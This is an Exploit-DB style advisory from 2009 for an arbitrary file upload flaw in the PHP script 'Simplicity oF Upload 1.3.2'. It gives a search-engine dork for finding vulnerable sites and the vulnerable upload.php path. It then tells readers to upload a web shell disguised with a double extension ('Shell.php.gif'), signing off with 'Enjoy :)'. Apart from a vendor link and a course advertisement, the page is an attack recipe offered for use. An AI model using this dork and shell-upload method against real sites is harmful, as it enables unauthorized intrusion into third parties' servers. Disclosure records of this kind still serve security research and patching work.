Simplicity oF Upload 1.3.2 - Arbitrary File Upload

EDB-ID:

10568




Platform:

PHP

Date:

2009-12-20


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Simplicity oF Upload (1.3.2) Remote File Upload Vulnerability
# Date: 20-12-2009
# Author: Master Mind
# Software Link: http://www.phpsimplicity.com/scripts.php?id=3
# Version: 1.3.2
# CVE : [N/A]
# Tested on: Windows 2003 Server

==========================================================================

~ Script Name : Simplicity oF Upload (1.3.2)
~ Language : php
~ Download Page : http://www.phpsimplicity.com/scripts.php?id=3
~ Author : Master Mind
~ Home : www.shdowskill.com , www.vbspiders.com
============================================================

Dork : Powered By: © Simplicity oF Upload

Exploit :
http://{target}/[script path/upload.php

upload you shell [Shell.php.gif]

Enjoy :)

------------------------------------------------------------------------------------------------------------------------------------------

Greets : The Electronic Bomb , Twi[L]ighT , R3D EYE, Doom[PS] , AND  ALL MEMBERS.